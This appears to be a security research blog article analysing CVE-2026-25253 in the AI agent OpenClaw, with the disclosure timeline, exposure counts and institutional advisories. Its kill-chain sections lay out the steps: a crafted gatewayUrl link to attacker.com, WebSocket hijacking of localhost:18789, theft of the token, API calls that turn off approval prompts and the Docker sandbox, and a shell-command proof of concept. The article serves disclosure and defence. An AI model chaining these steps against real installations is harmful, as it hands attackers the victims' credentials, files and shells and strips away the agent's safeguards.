← Back to Webthreepedia
WEBTHREEPEDIA RESEARCH

[DEEP DIVE] CVE-2026-25253: The One-Click Kill Chain (2/10)

Zephyra|February 20, 2026|BPF
EXECUTIVE SUMMARY

CVE-2026-25253 is a CVSS 8.8 remote code execution vulnerability in OpenClaw that converts a single mouse click into full system compromise. The flaw, classified under CWE-669 (Incorrect Resource Transfer Between Spheres), allows an attacker to steal a user's authentication token, hijack the loca...

"Defensive sandbox and safety guardrails were designed to contain malicious LLM actions, but they don't protect from this vulnerability." — Mav Levin, Founding Security Researcher, depthfirst

Executive Summary

CVE-2026-25253 is a CVSS 8.8 remote code execution vulnerability in OpenClaw that converts a single mouse click into full system compromise. The flaw, classified under CWE-669 (Incorrect Resource Transfer Between Spheres), allows an attacker to steal a user's authentication token, hijack the local WebSocket connection, disable all safety guardrails, escape the Docker sandbox, and execute arbitrary shell commands — in milliseconds.

The vulnerability was discovered by Mav Levin of the depthfirst research team in late January 2026 and patched in version 2026.1.29 on January 30. Versions up to v2026.1.24-1 were affected. The GitHub Security Advisory was published as GHSA-g8p2-7wf7-98mq on January 31. Between the public announcement and the patch, Terrace Networks honeypot data recorded exploitation scanning beginning within hours. Censys tracked exposed instances growing from approximately 1,000 to over 21,000 in six days.

Belgium's Centre for Cybersecurity (CCB) issued an emergency advisory on February 2. The University of Toronto published a vulnerability notification on February 4. By the time ClawHavoc — the supply chain poisoning campaign — launched at scale, thousands of instances remained unpatched.

Table of Contents

  1. The Vulnerability: What Broke
  2. The Kill Chain: Five Steps to Full Compromise
  3. Step 1 — Gateway URL Injection: The Entry Point
  4. Step 2 — Cross-Site WebSocket Hijacking: The Pivot
  5. Step 3 — Token Exfiltration: The Keys to the Kingdom
  6. Step 4 — Sandbox Escape: Dismantling the Guardrails
  7. Step 5 — Arbitrary Execution: Game Over
  8. The Milliseconds Timeline
  9. Why Localhost Was Never Safe
  10. The Patch Gap: From Disclosure to Exploitation
  11. Institutional Response
  12. Comparison to Historical 1-Click Exploits
  13. Key Takeaways
  14. Conclusion

The Vulnerability: What Broke

The root cause is a logic flaw in OpenClaw's Control UI. The application accepts a gatewayUrl parameter from the URL query string and persists it to local storage without validation. On page load, the system calls connectGateway() immediately — no user confirmation required. The WebSocket connection handshake automatically bundles the user's stored authToken into the payload.

According to Peter Steinberger's own advisory, the Control UI "trusts gatewayUrl from the query string without validation and auto-connects on load, sending the stored gateway token in the WebSocket connect payload."

The second failure: OpenClaw's WebSocket server does not validate the Origin header. It accepts connections from any website. A page running on attacker.com can establish a WebSocket connection to ws://localhost:18789 — OpenClaw's default port — through the victim's browser. The browser acts as the bridge.

Two missing checks. Zero user interaction beyond one click. Full system access.

The Kill Chain: Five Steps to Full Compromise

The depthfirst research team documented a five-step exploitation chain that executes end-to-end in milliseconds. Each step feeds the next. None requires additional user interaction after the initial click.

Step 1 — Gateway URL Injection: The Entry Point

The attack begins with a crafted URL. In app-settings.ts, OpenClaw blindly accepts a gatewayUrl query parameter and persists it to storage. A link formatted as https://localhost?gatewayUrl=attacker.com overwrites the legitimate gateway address with the attacker's server.

The victim does not see a confirmation dialog. There is no warning. The URL parameter is processed silently on page load. The attacker distributes the link through any channel — email, chat, social media, embedded in a webpage, or injected through a compromised skill's documentation.

Step 2 — Cross-Site WebSocket Hijacking: The Pivot

Once the gateway URL is overwritten, app-lifecycle.ts executes connectGateway() immediately. The system opens a WebSocket connection to the attacker's server. The gateway.ts module automatically includes the authToken in the connection handshake.

Simultaneously, the attacker's malicious webpage executes client-side JavaScript that connects directly to ws://localhost:18789 — the victim's local OpenClaw gateway. This is a Cross-Site WebSocket Hijacking (CSWSH) attack. It works because OpenClaw's WebSocket server performs no Origin header validation. The server cannot distinguish between a legitimate local connection and a malicious cross-origin request initiated by the attacker's JavaScript through the victim's browser.

The attacker now holds two things: the victim's authentication token (exfiltrated to attacker.com) and a live WebSocket connection to the victim's local gateway (through the browser pivot).

Step 3 — Token Exfiltration: The Keys to the Kingdom

The stolen token carries operator.admin and operator.approvals scopes. These are the highest privilege levels in OpenClaw's permission model. With this token, the attacker has the same access as the authenticated user — which, given OpenClaw's architecture, means access to email, calendar, messaging, file system, shell commands, browser automation, and every connected integration.

The token was designed to authorize the user's own interactions with their gateway. It was never intended to be exposed to external parties. The missing Origin validation means any website the user visits while authenticated to OpenClaw's Control UI can capture it.

Step 4 — Sandbox Escape: Dismantling the Guardrails

OpenClaw runs operations inside a Docker container by default. Users must confirm potentially dangerous actions before execution. These two mechanisms — containerization and confirmation prompts — constitute the tool's primary safety architecture.

The attacker dismantles both with two API calls:

Disable user confirmation: The attacker sends an exec.approvals.set request with ask: "off". This removes the confirmation dialog for all subsequent operations. The user sees nothing. The guardrail designed to prevent unauthorized actions is silently removed.

Escape the Docker container: The attacker sends a config.patch request setting tools.exec.host to "gateway". This reconfigures the execution environment to run commands directly on the host machine rather than inside the sandboxed container. The isolation boundary is gone.

Both API calls execute through the WebSocket connection using the stolen operator-level token. Both succeed silently. The user receives no notification.

Step 5 — Arbitrary Execution: Game Over

With confirmations disabled and the sandbox bypassed, the attacker sends a node.invoke request. The payload specifies a system.run command with arbitrary shell instructions. Depthfirst's proof-of-concept used bash -c 'echo hacked > /tmp/hacked'. In practice, the command could install backdoors, exfiltrate files, deploy ransomware, pivot to network-adjacent systems, or harvest every credential and memory file OpenClaw stores.

The commands execute with whatever OS privileges the OpenClaw process runs under. For the majority of users — those who followed default installation instructions — this is their primary user account. On macOS, this typically means access to the Desktop, Documents, Downloads, Keychain, and every application's data directory.

The Milliseconds Timeline

Levin characterized the full exploit chain as completing "in milliseconds after a victim visits a single malicious web page." The sequence:

  1. T+0ms: Victim clicks link or loads malicious page
  2. T+~50ms: JavaScript executes, gatewayUrl parameter processed, gateway token transmitted to attacker server
  3. T+~100ms: Attacker's script opens WebSocket to ws://localhost:18789 via victim's browser
  4. T+~150ms: exec.approvals.set sent — confirmation prompts disabled
  5. T+~200ms: config.patch sent — Docker sandbox bypassed
  6. T+~250ms: node.invoke sent — arbitrary shell command executed on host

Sub-second. No dialog boxes. No warnings. No visual indicators. The browser tab that delivered the exploit can display a benign webpage while the attack completes in the background.

Why Localhost Was Never Safe

A common assumption among self-hosted software users: if the service binds to 127.0.0.1 (localhost) and is not exposed to the internet, it is safe from external attack. CVE-2026-25253 invalidates this assumption entirely.

Steinberger confirmed: the attack works "even when the gateway binds to loopback because the victim's browser acts as the bridge." The browser is already running on localhost. It has network access to 127.0.0.1:18789. When a malicious website instructs the browser to open a WebSocket to that address, the browser complies — it is making a local connection, which operating systems and firewalls permit by default.

This is the same class of attack that has historically compromised development tools, database management interfaces, and local API servers. The difference with OpenClaw is the scope of access at stake: not a database, but the user's entire digital life — email, messages, files, shell, credentials, and a plain-text memory archive of their daily activities, relationships, and finances.

The Patch Gap: From Disclosure to Exploitation

The timeline between vulnerability announcement and active exploitation measured in hours, not days.

January 25, 2026: OpenClaw goes viral on Hacker News. A security audit (GitHub Issue #1796) identifies 512 vulnerabilities, 8 critical.

January 26, 2026: Terrace Networks honeypot data records the first exploitation scanning on TCP port 18789 — the same day as the Hacker News announcement. Scanning sources showed a "smooth rise" over subsequent days, indicating broad, automated bot activity rather than targeted campaigns.

January 30, 2026: Version 2026.1.29 released, patching CVE-2026-25253. GitHub Security Advisory GHSA-g8p2-7wf7-98mq published the following day.

January 31 – February 9, 2026: Censys documented growth from approximately 1,000 to over 21,000 publicly exposed instances between January 25 and 31. Bitsight identified over 30,000 exposed instances in a broader window. SecurityScorecard's STRIKE team ultimately found 135,000+ unique IPs running OpenClaw across 82 countries, with 12,812 exploitable via RCE. Independent researcher Maor Dayan identified 42,665 exposed instances, of which 5,194 were actively vulnerable — 93.4% exhibiting authentication bypass.

The patch existed. The adoption lagged. And the scanning was already underway before the fix shipped.

Institutional Response

Belgium's Centre for Cybersecurity (CCB) — February 2, 2026: Issued an emergency advisory rating the vulnerability at CVSS 8.8, recommending organizations install updates "with the highest priority, after thorough testing." The CCB noted a critical caveat: patching prevents future exploitation but "does not remediate historical compromise." Organizations were advised to assume prior breaches may have exposed API keys and stored credentials.

University of Toronto Information Security — February 4, 2026: Published a vulnerability notification advising users to update to version 2026.1.29 or later, rotate all tokens and credentials, avoid browsing untrusted pages while logged into the Control UI, use isolated browser profiles, and monitor logs for unauthorized configuration changes.

Microsoft Security Blog — February 19, 2026: Published "Running OpenClaw Safely: Identity, Isolation, and Runtime Risk," characterizing OpenClaw deployments as "self-hosted agents [that] execute code with durable credentials and process untrusted input," creating "dual supply chain risk, where skills and external instructions converge in the same runtime."

SecurityScorecard — February 2026: Warned that "the more centralized the access, the more damage a single compromise can cause. What looks like convenience is actually a concentration of risk."

Comparison to Historical 1-Click Exploits

CVE-2026-25253 belongs to a lineage of 1-click exploitation techniques, though its scope of post-compromise access distinguishes it from predecessors.

NSO Group's Pegasus (2016): The original Pegasus deployment required a victim to click a link in an SMS message — a 1-click exploit chain that delivered full smartphone surveillance. NSO later evolved to zero-click attacks (FORCEDENTRY in 2021, BLASTPASS in 2023), which required no user interaction at all. Google Project Zero called FORCEDENTRY "one of the most technically sophisticated exploits we've ever seen." Pegasus was state-sponsored, sold for millions per deployment, and targeted journalists and dissidents.

CVE-2026-25253 vs. Pegasus: OpenClaw's vulnerability required less technical sophistication to exploit than Pegasus. No memory corruption. No sandbox escape through kernel bugs. No zero-day browser chain. The OpenClaw kill chain used standard WebSocket APIs and HTTP requests — tools available to any web developer. The barrier to exploitation was not capability but knowledge. Once the depthfirst writeup was public, any attacker with basic JavaScript proficiency could reproduce it.

The difference in post-compromise access is also significant. Pegasus targeted mobile devices — contacts, messages, camera, microphone. CVE-2026-25253 targeted a tool that connects to 50+ integrations, stores session transcripts as JSONL, and maintains plain-text memory files documenting the user's relationships, financial details, daily activities, and credentials. The attack surface is not a phone. It is the user's entire computing environment and every service connected to it.

Where Pegasus cost governments millions to deploy against individual targets, CVE-2026-25253 could be weaponized at scale through a single malicious webpage — no government contract required.

Key Takeaways

  • CVE-2026-25253 (CVSS 8.8, CWE-669): 1-click RCE via WebSocket hijacking. No Origin header validation. Affects all versions up to v2026.1.24-1.
  • Five-step kill chain completes in sub-second timeframes: gateway URL injection → token exfiltration → WebSocket hijack → sandbox escape → arbitrary shell execution.
  • Localhost binding provides no protection. The victim's browser acts as the pivot, bridging external attackers to the local gateway on port 18789.
  • Honeypot scanning began within hours of OpenClaw's viral announcement on January 26, per Terrace Networks data. Automated bot activity, not targeted campaigns.
  • 135,000+ exposed instances identified by SecurityScorecard across 82 countries. 12,812 exploitable via RCE. 93.4% of independently verified vulnerable instances showed authentication bypass.
  • Patch gap: Four days between viral adoption (January 26) and fix (January 30). Scanning was already underway before the patch existed.
  • Belgium, University of Toronto, and Microsoft all issued formal advisories. Belgium's CCB warned organizations to assume prior breaches.
  • Lower exploitation barrier than Pegasus. No memory corruption or kernel exploits required. Standard WebSocket APIs and HTTP requests sufficient for full system compromise.

Conclusion

CVE-2026-25253 is not a complex exploit. It chains two missing validation checks — a query parameter and a WebSocket Origin header — into a full system compromise. The technical sophistication required to exploit it is minimal. The damage it enables is maximal, given OpenClaw's access to email, messaging, file systems, shell commands, credentials, and plain-text memory files containing the user's personal life.

The patch shipped on January 30. Scanning began January 26. The gap between viral adoption and security hardening was measured in days. For the thousands of instances that remained unpatched when ClawHavoc's supply chain attack launched the following day, CVE-2026-25253 was not a theoretical risk — it was an open door.

Part 3 of this series examines what walked through that door: the ClawHavoc campaign, 1,184 malicious skills, and the supply chain poisoning of OpenClaw's marketplace.


Sources & References

  1. depthfirst — 1-Click RCE To Steal Your OpenClaw Data and Keys (CVE-2026-25253) — Original vulnerability research by Mav Levin
  2. GitHub Security Advisory GHSA-g8p2-7wf7-98mq — Official OpenClaw security advisory
  3. NVD — CVE-2026-25253 — National Vulnerability Database entry
  4. The Hacker News — OpenClaw Bug Enables One-Click Remote Code Execution via Malicious Link — Technical reporting on the vulnerability
  5. Belgium CCB — Warning: Critical Vulnerability in OpenClaw — Belgium Centre for Cybersecurity emergency advisory, February 2, 2026
  6. University of Toronto — OpenClaw Vulnerability Notification — Institutional advisory, February 4, 2026
  7. Microsoft Security Blog — Running OpenClaw Safely: Identity, Isolation, and Runtime Risk — Microsoft's runtime risk analysis, February 19, 2026
  8. Terrace Networks — The 24-Hour Exploit: How OpenClaw Scanning Ramped Up from Zero to Global in a Day — Honeypot data and scanning timeline analysis
  9. Censys — OpenClaw in the Wild: Mapping the Public Exposure of a Viral AI Assistant — Internet-wide exposure tracking
  10. SecurityScorecard — How Exposed OpenClaw Deployments Turn Agentic AI Into an Attack Surface — 135,000+ exposed instances report
  11. Bitsight — OpenClaw AI Security: Risks of Exposed AI Agents Explained — 30,000+ exposed instance analysis
  12. Infosecurity Magazine — Researchers Find 40,000+ Exposed OpenClaw Instances — SecurityScorecard STRIKE team findings
  13. SOCRadar — CVE-2026-25253: 1-Click RCE in OpenClaw Through Auth Token Exfiltration — Technical vulnerability analysis
  14. runZero — OpenClaw RCE Vulnerability: CVE-2026-25253 — Detection and remediation guidance
  15. The Conscia Group — The OpenClaw Security Crisis — Comprehensive crisis overview
  16. Google Project Zero — A Deep Dive Into an NSO Zero-Click iMessage Exploit — FORCEDENTRY technical analysis for Pegasus comparison
  17. Citizen Lab — FORCEDENTRY: NSO Group iMessage Zero-Click Exploit — Pegasus zero-click exploit research